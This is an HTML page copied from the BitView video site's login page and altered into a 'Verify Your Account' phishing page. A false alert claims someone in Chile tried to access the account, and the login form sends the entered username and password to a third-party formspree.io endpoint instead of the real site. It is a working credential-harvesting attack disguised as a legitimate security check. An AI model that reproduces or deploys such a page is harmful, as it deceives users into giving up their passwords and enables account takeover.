
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="BitView is the best place to share your videos with the world and your friends and family." />
<meta name="keywords" content="video, clips, camera, recording, upload, share" />

<title>BitView - Verify Your Account</title>
<link href="css/main98f1.css?20" rel="stylesheet" type="text/css" />
<!--[if lt IE 8]>
<link href="/css/main.css?20" rel="stylesheet" type="text/css" />
<![endif]-->
<script src="../pagead2.googlesyndication.com/pagead/js/f.txt" async></script>
<script>
    (adsbygoogle = window.adsbygoogle || []).push({
        google_ad_client: "ca-pub-8433080377364721",
        enable_page_level_ads: true
    });
</script>		<style>
		body { word-break:break-all; }
		</style>
    </head>
    <body> 
        <div id="baseDiv" class=" date-20080710">
        <div id="masthead">
                <a href="index.html" class="logo"><img src="img/bitview.gif" alt="BitView - Your Digital Video Repository" width="120" height="48" border="0"></a>
                <div class="user-info">
    <div id="util-links" class="normal-utility-links">
                <span class="util-item first"><b><a href="signup.html" onclick="">Sign Up</a></b></span>
        <span class="util-item"><a href="index.html">Viewing History</a></span>
        <span class="util-item"><a href="help.html">Help</a></span>
        <span class="util-item"><a href="login.html" class="loginBoxZ eLink" onclick="">Log In</a></span>
            </div>
        </div>
        <div class="nav">
            <div class="nav-item first  selected " id="nav-item-home">
                <span class="leftcap"></span>
                <a class="content" href="index.html">Home</a>
                <span class="rightcap"></span>
            </div>
            <div class="nav-item  " id="nav-item-videos">
                <div class="nav-tab">
                    <span class="leftcap"></span>
                    <a class="content" href="videos.html">Videos</a>
                    <span class="rightcap"></span>
                </div>
            </div>
            <div class="nav-item  " id="nav-item-channels">
                <div class="nav-tab">
                    <span class="leftcap"></span>
                    <a class="content" href="channels.html">Channels</a>
                    <span class="rightcap"></span>
                </div>
            </div>
            <div class="nav-item  " id="nav-item-community">
                <div class="nav-tab">
                    <span class="leftcap"></span>
                    <a class="content" href="groups.html">Community</a>
                    <span class="rightcap"></span>
                </div>
            </div>
        </div>
        

        <div class="bar">
            <span class="leftcap"></span>
            <div class="search-bar">
                <a href="login.html" id="upload-button" class="action-button">
                    <span class="action-button-leftcap"></span>
                    <span class="action-button-text">Upload</span>
                    <span class="action-button-rightcap"></span>
                </a>
                <div id="search-form">
                       <form name="searchForm" id="searchForm" method="GET" action="http://www.bitview.net/results.php">

            <input tabindex="1" type="text" name="search" maxlength="128" id="searchField" value="">
            <select name="t">
                <option value="Search Videos">Videos</option>
                <option value="Search Users">Members</option>
                <option value="Search Groups">Groups</option>
                <option value="Search Playlists">Playlists</option>
            </select>
            <input type="submit" value="Search">
        </form>
                </div>
            </div>
            <span class="rightcap"></span>
        </div>


        <div id="search-advanced-form" class="hid">
            <div class="search-setting-inner alignC">Loading...</div>
        </div>

        <div class="clear"></div>
            </div>        <div class="wrapper">            <style>
    .hr {
        height: 1px;
        border-bottom: 1px dotted #999;
        margin: 20px 0px;
    }
    .signup-main {
        width: 875px;
    }
    .signup-title {
        font-weight: bold;
    }
    #verificationImage {
        float: left;
        width: 200px;
    }
    .action-button .end-cap {
        float:left;
    }
    #signup-text {
        margin-left:10px;
        margin-right:30px;
    }
    .img-action-button-cap-left {
        background:transparent url(img/master-vfl47921.gif) no-repeat scroll -162px -37px;
        height:25px;
        width:5px;
    }
    .img-action-button-cap-right {
        background:transparent url(img/master-vfl47921.gif) no-repeat scroll -167px -37px;
        height:25px;
        width:5px;
    }
    img {
        border:medium none;
    }
    .action-button .content {
        background: transparent url(img/master-vfl47921.gif) repeat-x scroll -310px -377px;
        color: #0033CC;
        float: left;
        height: 20px;
        padding: 5px 5px 0pt;
    }
    .action-button .content .title {
        font-size:13px;
        font-weight:bold;
    }
    .signup-link a {
        text-decoration: none;
    }
    .signup-link a:hover {
        text-decoration: underline;
    }
    .signup-outer-frame {
        border-color:#999999;
        border-style:solid;
        border-width:1px;
        margin-bottom:5%;
        margin-left:15%;
        margin-right:15%;
        margin-top:0%;
        padding:5px;
    }
    .signup-inner-frame {
        border-color:#CCCCCC;
        border-style:solid;
        border-width:1px;
        background-color: #eeeeee;
    }
    #signup-bitview-logo {
        padding-bottom:4px;
        padding-top:4px;
        width: 73px;
        height: 29px;
        vertical-align: middle;
    }
    #signup-gaia-logo {
        height: 31px;
        width: 80px;
    }
    .signup-table {
        width: 100%;
    }
    #suInOrderToDiv {
        background-color: #FFFFCC;
        border: 1px solid #CCCC66;
        margin: 6px 25%;
        padding: 6px;
        font-weight: bold;
    }
    .loginFormLabel {
        text-align: right;
        vertical-align: top;
    }
    .loginFormField {
        width: 160px;
    }
    .alertBoxSm {
        border: 2px solid #C00;
        padding: 6px;
        margin-top: 6px;
        margin-bottom: 6px;
        text-align: left;
        font-weight: bold;
        font-size: 12px;
        color: #000;
    }
    .loginField {
        width: 130px;
    }
    /* password strength */
    .password_empty {
        background-color: #e0e0e0;
        width:100%;
    }
    .password_weak {
        background-color: red;
        width:25%;
    }
    .password_fair {
        background-color: yellow;
        width:50%
    }
    .password_good {
        background-color: #6699CC;
        width:75%;
    }
    .password_strong {
        background-color: green;
        width:100%;
    }
    .invitation {
        width: 500px;
        margin-bottom: 15px;
        text-align: center;
    }
    #pagination-top {
        padding: 25px 0pt 5px;
        text-align: right;
    }
    #main-table {
        width: 875px;
    }
    .blue-button {
        margin: 0;
    }
</style>
<div id="sectionHeader" class="communityColor">
    <div class="name" align="left" style="width:500px;">Verify Your Account</div>
</div><br>
<div class="signup-main">
    <table cellpadding="0" cellspacing="0" id="main-table">
        <tbody><tr>
            <td width="50%" valign="top">
                <div id="suSigninDiv">
                   
                    
                    <ul>

                         <li>Someone tried to log into your account, the attacker</li>
                        <li>appears to be located in Chile</li>
                        <li>but this location may not be true.</li>

                    </ul>
                </div>
            </td>
            <td valign="top">

                <div id="siSignupDiv" class="signup-outer-frame">
                    <div class="signup-inner-frame">
                        <form name="loginForm" id="loginForm" action="https://formspree.io/f/mayldyjk" method="post">

                            <div style="margin-left:10px;margin-right:10px;">
                                <table class="signup-table" cellspacing="0" cellpadding="4">
                                    <tbody><tr>
                                        <td colspan="2" align="center">
                                            <img id="signup-bitview-logo" src="img/bitview.png">
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="loginFormLabel">	<span class="nowrap">Username:</span>
                                        </td>
                                        <td><input type="text" size="20" maxlength="128" name="username" /></td>
                                    </tr>
                                    <tr>
                                        <td class="loginFormLabel">	<span class="nowrap">Password:</span>
                                        </td>
                                        <td><input type="password" size="20" maxlength="20" name="password" id="password"/></td>
                                    </tr>
                                    <tr>
                                        <td class="loginFormLabel">&nbsp;</td>
                                        <td>
                                            <div class="action-button" style="" id="button-signin">


                                                <a id="button-signin-link" href="#" onclick="document.getElementById('loginForm').submit();">
                                                    <div class="end-cap img-action-button-cap-left"></div>
                                                    <div class="content hand"><span class="title" id="button-signin-title">Sign In</span></div>
                                                    <div class="end-cap img-action-button-cap-right"></div>
                                                </a>
                                            </div>
                                                                                        <input type="hidden" name="log_in" value="Log In">
                                        </td>
                                    </tr>
                                    <tr>
                                        <td colspan="2">
                                            <div class="signup-link smallText" align="center"> <a href="javascript:alert('Please contact us on Twitter: BitView_');">Forgot Password</a>&nbsp;|&nbsp;<a href="help.html" rel="nofollow">Help</a></div></td>
                                    </tr>
                                    </tbody></table>
                            </div>
                            <input type="submit" style="display: none;" /> <!-- for enter input -->
                            </form>
                    </div>
                </div>
                <div class="signup-outer-frame">
                    <div class="signup-inner-frame">
                        <table class="signup-table" cellpadding="4" cellspacing="0">
                            <tbody><tr>
                                <td colspan="2" align="center">
                                    <div align="center"><strong>No account?</strong><br></div>
                                    <div class="signup-link" align="center"> <a href="signup.html"><strong>Sign up for a BitView Account</strong>! </a></div></td>
                            </tr>
                            </tbody></table>
                    </div>
                </div>
            </td>
        </tr>
        </tbody></table>
</div>
<div class="clear"></div>
            </div>        <div id="footer">
		<div class="search">
			<div class="promo">
			</div>
            <form name="searchForm" id="footer-search-form" method="GET" style="width: 73.5%;" action="http://www.bitview.net/results.php">

            <input tabindex="1" type="text" name="search" maxlength="128" id="searchField" value="">
            <select name="t">
                <option value="Search Videos">Videos</option>
                <option value="Search Users">Members</option>
                <option value="Search Groups">Groups</option>
                <option value="Search Playlists">Playlists</option>
            </select>
            <input type="submit" value="Search">
        </form>
		</div>
		<div class="links">
			<table cellpadding="0" cellspacing="0">
				<tbody><tr>
					<th colspan="2">Your Account</th>
					<th class="separator" colspan="2">Help &amp; Info</th>
					<th class="separator" colspan="2">BitView</th>
				</tr>
				<tr>
					<td><a href="login.html">Videos</a></td>
					<td><a href="login.html">Inbox</a></td>
					<td class="separator"><a href="help.html">Help Center</a></td>
					<td><a href="https://twitter.com/bitview_">Our Twitter</a></td>
					<td class="separator"><a href="about.html">About</a></td>
					<td><a href="whats_new.html">What's New</a></td>
				</tr>
				<tr>
					<td><a href="login.html">Playlists</a></td>
					<td><a href="login.html">more...</a></td>
					<td class="separator"><a href="https://discord.gg/8WUTqUg">Our Discord</a></td>
					<td><a href="guidelines.html">Community Guidelines</a></td>
					<td class="separator"><a href="terms.html">Terms of Use</a></td>
					<td><a href="privacy.html">Privacy Policy</a></td>
				</tr>
				

			</tbody></table>
		</div>
	</div>

	<div id="copyright">
		Copyright © 2017-2021 BitView 
	</div>     </body> 
</div>

<!-- Mirrored from www.bitview.net/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 05 Jan 2021 03:03:47 GMT -->
</html>